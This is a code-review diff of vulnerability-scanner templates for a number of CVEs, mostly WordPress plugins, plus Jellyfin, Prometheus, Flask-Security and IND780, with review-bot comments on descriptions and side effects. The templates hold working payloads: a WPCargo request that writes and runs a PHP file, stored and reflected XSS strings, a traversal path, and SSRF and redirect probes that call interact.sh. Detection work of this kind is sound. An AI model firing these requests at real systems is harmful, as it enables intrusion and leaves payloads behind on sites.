name: Ninja Forms < 3.4.34 - Administrator Open Redirect
name: WordPress Ninja Forms <3.4.34 - Open Redirect
author: dhiyaneshDk,daffainfo
severity: medium
description: |
The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
- https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -41,3 +41,5 @@ requests:
- 'status_code_2 == 302'
- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
condition: and
# Enhanced by md on 2022/10/14

View File

@ -1,17 +1,15 @@
id: CVE-2021-24210
info:
name: PhastPress < 1.111 - Open Redirect
name: WordPress PhastPress <1.111 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
go to whitelisted pages but it's possible to redirect the victim to any domain.
WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
- https://plugins.trac.wordpress.org/changeset/2497610/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

View File

@ -44,10 +44,10 @@ requests:
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="naam"

View File

@ -1,13 +1,13 @@
id: CVE-2021-24288
info:
name: AcyMailing < 7.5.0 - Open Redirect
name: WordPress AcyMailing <7.5.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully
go through with the subscription.
description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
reference:
- https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
- https://nvd.nist.gov/vuln/detail/CVE-2021-24288
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +25,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

View File

@ -1,13 +1,14 @@
id: CVE-2021-24838
info:
name: AnyComment < 0.3.5 - Open Redirect
name: WordPress AnyComment <0.3.5 - Open Redirect
author: noobexploiter
severity: medium
description: |
The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2022/10/14

View File

@ -1,11 +1,12 @@
id: CVE-2021-24940
info:
name: Persian Woocommerce < 5.9.8 - Cross-Site Scripting
name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in 5.9.8.
reference:
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
@ -41,3 +42,5 @@ requests:
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
- contains(body_2, 'woocommerce_persian_translate')
condition: and
# Enhanced by md on 2022/10/17

View File

@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and
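Review bot: the template writes a PHP file to the server (`filepath={{randstr}}.php` in the second request, landing in the plugin's `includes/` directory) and then executes it, but the `tags` line lacks `intrusive`, the tag that the file-upload RCE template CVE-2020-35489 in this same commit carries; add it, and note in the template that the dropped `{{randstr}}.php` is not removed afterwards so operators know to clean it up after a confirmed match. The `status_code_1 != 200` guard on the first request is a good pre-check that the random filename did not already exist.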

View File

@ -1,12 +1,13 @@
id: CVE-2021-25111
info:
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
name: WordPress English Admin <1.5.2 - Open Redirect
author: akincibor
severity: medium
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
- https://nvd.nist.gov/vuln/detail/CVE-2021-25111
tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
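Review bot: `tags:` sits between `reference:` and `classification:` here, whereas the other templates in this commit place it after the classification and metadata blocks; move it for consistency. The new description also omits the "redirect a user to a malicious site" clause used in the sibling open-redirect templates, so "An attacker can possibly obtain sensitive information" is asserted without saying how; add the redirect clause.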
@ -24,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

View File

@ -1,10 +1,10 @@
id: CVE-2021-27909
info:
name: Mautic - Cross-Site Scripting
name: Mautic <3.3.4 - Cross-Site Scripting
author: kiransau
severity: medium
description: Mautic versions prior to 3.3.4 are vulnerable to reflected XSS on password reset page where a vulnerable parameter, "bundle," in the URL could allow an attacker to execute Javascript code.
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
reference:
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

@ -1,31 +1,36 @@
id: CVE-2021-29490
info:
name: Jellyfin 10.7.2 SSRF
name: Jellyfin 10.7.2 - SSRF
author: alph4byt3
severity: medium
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
description: |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2021-29490
cwe-id: CWE-918
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
tags: cve,cve2021,ssrf,jellyfin
metadata:
verified: true
shodan-query: http.title:"Jellyfin"
tags: cve,cve2021,ssrf,jellyfin,oast
requests:
- method: GET
path:
- "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
- "{{BaseURL}}/Images/Remote?imageUrl=http://interact.sh/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://interact.sh/&ProviderName=TheMovieDB"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: body
words:
- "http"
- "<h1> Interactsh Server </h1>"
# Enhanced by cs on 2022/02/25
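Review bot: replacing `{{interactsh-url}}` with `http://interact.sh/` (L1520-L1523) and matching on `<h1> Interactsh Server </h1>` in the body (L1528-L1531) makes the template depend on a third-party landing page and on Jellyfin returning the fetched content verbatim; the check breaks the moment that page's HTML changes, and it silently misses blind SSRF where the request is made but the body is not echoed, which the old `part: interactsh_protocol` matcher (L1527) caught. The `oast` tag added on L1516 is now also misleading since no out-of-band interaction is used. Suggest keeping the interactsh path as the first entry and the body-echo variant as a fallback, since `stop-at-first-match: true` (L1524) already handles that ordering.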

@ -1,14 +1,16 @@
id: CVE-2021-29622
info:
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
name: Prometheus - Open Redirect
author: geeknik
severity: medium
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
reference:
- https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
- https://github.com/prometheus/prometheus/releases/tag/v2.26.1
- https://github.com/prometheus/prometheus/releases/tag/v2.27.1
- https://nvd.nist.gov/vuln/detail/CVE-2021-29622
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14
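Review bot: the new description on L1544 garbles the mechanism: "To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /" reads as if the UI switch happened in 2.27.0, whereas the original text on L1543 (and the advisory) places the default-UI change in 2.23.0, with `/new`-prefixed URLs redirecting to `/` and the bug living in that redirect. Suggest: "In 2.23.0 Prometheus made the new UI the default and redirects URLs prefixed with /new to /; a bug in that redirect lets an attacker craft a /new URL that redirects to an arbitrary external site." The remediation line on L1545 is accurate and should stay.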

@ -1,12 +1,10 @@
id: CVE-2021-32618
info:
name: Flask Open Redirect
name: Python Flask-Security - Open Redirect
author: 0x_Akoko
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@ -27,4 +25,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14
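Review bot: the rewrite on L1572 drops the one detail a reader needs, namely that a `next` value beginning with backslashes (the original's `http://login?next=\\\github.com` on L1570) passes urlsplit's same-netloc check but is normalised by browsers into an external host; that is exactly why the Location regex on L1581 accepts `\/\\\\|\/\\` prefixes, so the description should keep a one-line statement of the backslash trick. Also note that L1580 and L1581 are textually identical, so that hunk line is a whitespace-only change and worth confirming was intended.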

@ -0,0 +1,64 @@
id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
- https://wordpress.org/plugins/customize-login-image/
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-33851
cwe-id: CWE-79
metadata:
verified: "true"
tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(all_headers_4, "text/html")'
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true
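Review bot: request 3 (L1618-L1621) persists the payload in the site's options (`cli_logo_url=<script>alert(document.domain)</script>`) and at the same time blanks `cli_logo_file`, `cli_login_background_color` and `cli_custom_css`, so a scan overwrites the administrator's existing settings and leaves a stored XSS on the public login page with no cleanup step; the template should carry the `intrusive` tag and the description should say the payload is left behind. Separately, `_wp_http_referer=%2Fwordpress%2Fwp-admin%2F...` hard-codes a `/wordpress/` install path; WordPress redirects back to that referer after saving, so on any other install path request 3 ends in a redirect to a non-existent page. It does not affect the match because only `body_4` is checked (L1630-L1632), but derive it from the real path or drop the parameter.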

@ -1,15 +1,16 @@
id: CVE-2021-3654
info:
name: noVNC Open Redirect
name: Nova noVNC - Open Redirect
author: geeknik
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
- https://bugs.python.org/issue32084
- https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
- https://nvd.nist.gov/vuln/detail/CVE-2021-3654
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
status:
- 302
- 301
# Enhanced by md on 2022/10/14
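Review bot: the new name "Nova noVNC" on L1649 should identify the product as the OpenStack Nova noVNC proxy, which is what the opendev.org/openstack/nova fix on L1658 patches; the generic impact sentence on L1653 could then say that a crafted path on the proxy redirects the VNC console user to an external site. Minor: the cve.mitre.org reference on L1656 uses plain http.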

@ -14,7 +14,7 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-39327
cwe-id: CWE-200
tags: exposures,packetstorm,cve,cve2021,wordpress
tags: exposure,packetstorm,cve,cve2021,wordpress
requests:
- method: GET

@ -0,0 +1,40 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
author: For3stCo1d
severity: high
description: |
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40661
cwe-id: CWE-22
metadata:
google-query: inurl:excalweb.dll
shodan-query: IND780
verified: "true"
tags: cve,cve2021,ind780,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ExePath=\Windows'
- 'WorkDir=\Windows'
condition: and
- type: status
status:
- 200
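Review bot: the sidsecure.au reference on L1691 carries tracking parameters (`?_sm_pdc=1&_sm_rid=...`) that should be stripped before merge. The description on L1689 is one very long sentence; splitting it into the affected builds, the traversal via the `webpage` parameter of `excalweb.dll`, and the impact would help, and it should say explicitly that the probe only reads `AutoCE.ini` (L1707), which is why the `ExePath=\Windows` / `WorkDir=\Windows` pair on L1713-L1714 is the expected proof.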

@ -1,11 +1,11 @@
id: CVE-2021-41432
info:
name: FlatPress 1.2.1 - Cross-site scripting
name: FlatPress 1.2.1 - Stored Cross-Site Scripting
author: arafatansari
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/flatpressblog/flatpress/issues/88
- https://nvd.nist.gov/vuln/detail/CVE-2021-41432
@ -74,3 +74,5 @@ requests:
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
# Enhanced by md on 2022/10/17

@ -0,0 +1,52 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0147
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0147
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'"
- "toplevel_page_wp-gdpr-compliance"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
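Review bot: the body matcher on L1779 pins the reflection in its backslash-escaped form (`x=\' onanimationstart=...` once YAML unescaping is applied), i.e. it expects the plugin to addslashes the quote; that is still exploitable because a backslash does not escape a quote in HTML, but if another affected build echoes the raw quote the template misses it. Either match on the part after the quote (`onanimationstart=alert(document.domain) style=animation-name:rotation x`) or state in a comment that the escaped echo is what 2.0.7 produces. The description on L1750 should also name the `x` parameter and the `< 2.0.8` bound that the name on L1746 already gives.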

@ -1,11 +1,11 @@
id: CVE-2022-0412
info:
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
author: edoardottt
severity: critical
description: |
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
reference:
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 400
# Enhanced by mp on 2022/10/12
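Review bot: the rewritten description on L1801 drops the second affected product; the original on L1800 lists both "TI WooCommerce Wishlist" and "TI WooCommerce Wishlist Pro" before 1.40.1 as vulnerable via the `wishlist/remove_product` REST endpoint, and both share the same `item_id` injection, so the Pro variant should stay in the text.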

@ -1,11 +1,11 @@
id: CVE-2022-0535
info:
name: E2Pdf < 1.16.45 - Cross-Site Scripting
name: WordPress E2Pdf <1.16.45 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The E2Pdf WordPress plugin before 1.16.45 does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/a4162e96-a3c5-4f38-a60b-aa3ed9508985
- https://wordpress.org/plugins/e2pdf/
@ -62,3 +62,5 @@ requests:
group: 1
regex:
- 'name="_nonce" value="([0-9a-zA-Z]+)"'
# Enhanced by md on 2022/10/18
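Review bot: the rewrite on L1822 removes the privilege requirement that the original on L1821 states ("could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed"), and the new generic "inject arbitrary script in the browser of an unsuspecting user" reads as if the flaw were unauthenticated; keep the high-privilege precondition, since it is the whole point of the unfiltered_html bypass and matches the template's login step.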

@ -1,15 +1,14 @@
id: CVE-2022-0679
info:
name: Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE
name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion
author: Veshraj
severity: critical
description: |
The plugin fails to validate and sanitize the lib_path parameter before it is passed into a call to require() via the narnoo_distributor_lib_request AJAX action (available to both unauthenticated and authenticated users) which results in the disclosure of arbitrary files as the content of the file is then displayed in the response as JSON data. This could also lead to RCE with various tricks but depends on the underlying system and it's configuration.
WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
reference:
- https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8
- https://nvd.nist.gov/vuln/detail/CVE-2022-0679
- https://www.cvedetails.com/cve/CVE-2022-0679/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -39,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12
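Review bot: the new description on L1843 loses the statement from L1842 that the `narnoo_distributor_lib_request` AJAX action is "available to both unauthenticated and authenticated users"; that reachability is what justifies the PR:N vector on L1849 and the critical severity, so it should be kept rather than implied. The renamed title on L1838 ("Local File Inclusion") is fine given the text still notes the RCE path.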

@ -1,11 +1,11 @@
id: CVE-2022-0781
info:
name: Nirweb support < 2.8.2 - Unauthenticated SQLi
name: WordPress Nirweb Support <2.8.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
- https://wordpress.org/plugins/nirweb-support/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/12

@ -0,0 +1,41 @@
id: CVE-2022-0817
info:
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
